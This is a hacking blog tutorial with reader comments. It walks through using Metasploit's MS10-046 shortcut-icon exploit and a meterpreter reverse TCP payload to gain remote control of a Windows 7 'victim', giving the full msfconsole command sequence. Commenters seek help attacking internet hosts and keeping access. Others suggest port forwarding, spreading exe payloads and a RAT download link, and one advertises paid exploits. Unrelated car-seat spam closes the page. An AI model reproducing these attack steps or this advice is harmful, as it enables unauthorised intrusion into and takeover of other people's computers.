Today i am gonna show how to exploit any windows OS using metasploit. Exploiting a windows vulnerability to logging into the system with out username and password using Metasploit.
Before Hacking, you want to know about metasploit framework. If your are new one to hacking, its less possible to know about Metasploit.
Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
Requirements:
1. MetaSploit Installed ( Kali Linux Distribution)
2. Ruby Installed (Install all the package of Ruby to avoid any issues)
3. Two OS running either on same as virtual or physically different
4. Target host must not be running any AV
Machine 1: Host Kali Linux Machine
Machine 2: Target Windows 7 Machine
Msfconsole is by far the most popular part of the Metasploit Framework, and for good reason. It is one of the most flexible, feature-rich, and well-
supported tools within the Framework. Msfconsole provides a handy all-in-one interface to almost every option and setting available in the Framework; it’s like a one-stop shop for all of your exploitation dreams.
To launch msfconsole, enter msfconsole at the command line
#msfconsole
Now once you get the msf prompt type the below command and look for the module exploit/windows/browser/ms10_046_shortcut_icon_dllloader.
An exploit is the means by which an attacker, or pen tester for that matter, takes advantage of a flaw within a system, an application, or a service. An attacker uses an exploit to attack a system in a way that results in a particular desired outcome that the developer never intended.
Here above module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL.This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
Now once we have found the desired module we will use this exploit by typing the below command.
#msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
Once loaded your msf prompt should be inclusive of the loaded exploit. given below is the image
Now once the exploit is loaded we will set the payload for the above select exploit. In our scenario will be using reverse TCP payload. Type the below command to set payload.
A payload is code that we want the system to execute and that is to be selected and delivered by the Framework. A reverse shell is a payload that
creates a connection from the target machine back to the attacker as a Windows command prompt, whereas a bind shell is a payload that
“binds” a command prompt to a listening port on the target machine, which the attacker can then connect.
#msf > set payload windows/meterpreter/reverse_tcp
Now its time to do some configuration for the exploit/payload that we have just set. type the given command
#msf > show options
You should get below default output.
Now we have to set the local host to listen. Type the given below two commands.
#msf > set SRVHOST 192.168.31.20
This will be your HOST IP address running metasploit.
#msf > set LHOST 192.168.31.20
This will be also be your HOST IP address running metasploit.
Now check if the above applied configuration is applied.
#msf > show options
Now Finally we will start to exploit. Run the command Exploit.
#msf > exploit
Once executed we should “Server Started” (Make sure that your server is not running any web service on port 80)
On any Client machine simply open Internet Explorer and try to open http://192.168.31.20
Note: it will give your a pop-up asking from permission click ALLOW and Make sure you do not have any AntiVirus running on the target PC.
You can check the number of successful connected session by running the command sessons in msf console.
Now as we can see that we have one victim connected its time to login to the system. run the command session -i 1.
#meterpeter > session -i 1
Once connected type linux command to browse inside the System and have full control on it.
This Documentation is purely for educational purpose. so act with responsibility.
hey anther good one tutorial for hacking i looking this attack over internet , i try but failed so plz make tutorial on internet user. thanks
not sure but i believe you port forward 80 and then give the people on the internet the IP happy hacking
Is it possible to get the meterpreter directly..i mean without any click or pinging…direct get the meterpreter of the terget machine….as we did in case of xp by using
“”exploit/windows/smb/ms08_067_netapi””
please inform me
please help me
Yep it will connect directly to meterpreter , its an SMB vulnerability in windows XP , if the system is patched mean currently updated the meterpreter will not work.
Very nice tutorial!!
I tried this using my laptop and my desktop with windows 7 as Target.
Everything went smoothly, just when I entered on http://x.x.x.x(int the targeted computer), on the msfconsole(in the laptop) appeared “Sending UNC redirect to x.x.x.x” but nothing more happened.
Did I do something wrong?
ms10_046_shortcut_icon_dllloader – Sending UNC redirect
Thanks
i have the same issue 😦 did you find a solution?
open it in ie, it will resolve this issue
i am opening it in ie but i still have this problem
you must run the link in internet explorer friend
you dont inject the network so it will not show up into other pc
Yeah have the same problem here, You should tell us which Version of Windows 7 did you test with? And edition? and was it x86 or x64? and what was the exact version of Internet explorer?
My lab stucked on ” Sending LNK file..”
Thank you so much
and what is the version of your rubygem please?
everybody in comment says they have failed. Wanna reply?
Same problem as u guys, but good starting tutorial…
(he’s probably not gonna chew our food for us…)
Bazzofia!
It didn’t even work for me! it probably depends on the version of the browser and if the OS has been updated. what i would like to see is a payload that works even if if was updated.
i am using kali linux (not virtual) so i have this when i exploit
msf exploit(firefox_xpi_bootstrapped_addon) > exploit
[-] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
terminal shows this message,
i need the root directory for reverse_tcp in kali linux
Reblogged this on Người Đến Từ Bình Dương.
chinks 🙂
I cant run session -i 1 command..plz help… It says unknown command
sessions -i 1 ????
“Now as we can see that we have one victim connected its time to login to the system. run the command session -i 1.”
im stuck here too anyone can tell where to input this command?
you need to have the “meterpreter” that means that you are in the system and can do whatever you want the system to do. The meterpreter opens automaticly IF the hack has worked.
The tutorial ‘s goot but the attack itself sucks. What kind of attack isthat when you need to switch off your fw and av? Definetely not a real life attack.
NEED HELP.
All went swell than at the *exploit* command i failed to connect . here’s the error. ” [-] Exploit failed: REX::BindFailed The address is already in use or unavailable: (Ip address).”
The computer i was trying to exploit was my laptop running windo 7 . I disabled the avg for a second than exited out any running browser and ran the exploit on kali from a seperate computer and i got that error … what does it mean?
is there away to hack it without sending a link or any thing else
there is no way…
so good (Y) best i hv try this ..work good
for those stuck at the sending lnk phase (after the victim opened the created file), make sure that the av (windows defender) is off… after the victim made a session with your attacker, a meterpreter session should pop up after the sending command… verify the session number by uploading the command “sessions”…
You guys should just create an exe file as the payload itself.
If you want to check if it works, upload it to a file hosting server and download it to the targeted pc and exploit it.
In this method you don’t need to configure the SRVHOST.
You need to configure the LHOST to your own IP and the LPORT to any port you’d like, for example: 4321.
For a step by step, here is a great tutorial:
Hope I helped!
everyone is making tutorials based on local network , “no use” , how do we connect to external machine ? RHOST xxx.xxx.xx.xxx ? or different exploits ?
or do we just broadcast exe or any relevant file to gain administrative priveleges on web … ?
HI..how can i persist this attack?
what’s mean of that.
when i tried to exploit.. error is coming out
Exploit failed: REX::BindFailed The address is already in use or unavailable: (Ip address).”
Ehem i have an question . If I did all and I typed “exploit” and the. Url : 192.168.10.1 or whatever is there what then ? Does the victim needs only to click on it and then I have acces to his computer with “session -i 1 ” ?? Please help
MSF is uselsee,just a toys for Pupil,Don’t waste your life!
Youre right. better use a R A T. Try this http://ge.tt/7CagFXY2
i trying
May I get exploit file, and May I know the means of bellow command.
– exploit/windows/browser/ms10_046_shortcut_icon_dllloader
Thanks for your kindly support.
Because of KB2286198;Windows Update, download can’t perform properly.
Help…I need to get vm Kali to get session on vm win 7, but there IS firewall on in this scenario. Can anyone help Me?
Someone has discovered a new exploit for windows 7. 2016 pay per view.
because this showing is very basic and outdated.
Windows automatically updates its Internet Denier. and no longer serves.
Besides here you need a client that link between http://192.168.31.20.
AND THAT’S FOOL. THAT NOBODY would put IP in your browser.
And then let PAYLOAD TO INSTALL THE HACK.
——————————–
There are 3 ways a PC hacker:
-for exploit
-for malware
Phishing + -for social Ingeniría
-for a hacker with backdoor servers:
facebook, outlook, twitter, gmail, etcc
———————————–
PAYMENT FOR A NEW EXPLOIT EXPOSED FOR WINDOWS 7
EIGHEL
flavio_caceres@outlook.com
——————————–
[*] 192.168.1.101 ms13_037_svg_dashstyle – Gathering target information.
[*] 192.168.1.101 ms13_037_svg_dashstyle – Sending HTML response.
[*] 192.168.1.101 ms13_037_svg_dashstyle – Sending HTML to info leak…
[*] 192.168.1.101 ms13_037_svg_dashstyle – Using ntdll ROP
[*] 192.168.1.101 ms13_037_svg_dashstyle – Sending HTML to trigger..
it wil stop in here why is that? please help me
Started reverse TCP handler on 192.168.224.103:4444
[*] Send vulnerable clients to \\192.168.224.104\aRaRvL\.
[*] Or, get clients to save and render the icon of http:///.lnk
and now can i do??
Started reverse TCP handler on 192.168.224.103:4444
[*] Send vulnerable clients to \\192.168.224.104\aRaRvL\.
[*] Or, get clients to save and render the icon of http:///.lnk
Now what can i do????
how can I ensure that the server is not running any thing on port 80. How to fix this.
Hi, as soon as I start the exploit it only returns the following:
[ * ] Exploit running as background job.
[ * ] Started reverse TCP handler on x.my.ip:4444
[ * ] msf exploit(ms10_046_shortcut_icon_dllloader) > [ * ] Send vulnerable clients to \\x.client.ip.x\EIMXu\.
[ * ] Or, get clients to save and rend3er the icon of http:////lnk
And it does not go any further then that. It does not create the url like yours does and also does not state the the Server Started like yours does.
Am I missing something?
i try this on virtual machine , nothing work
What about a computer with an AV installed?
You could try the new double pulsar hack for windows 7 , it works remotely!
car seat for 4 year olds
best booster seat
car seat for kids
booster laws you should know
infant shoulder strap
weight limit for car seats
one star for the annoying autoplay advertisement. c’mon man.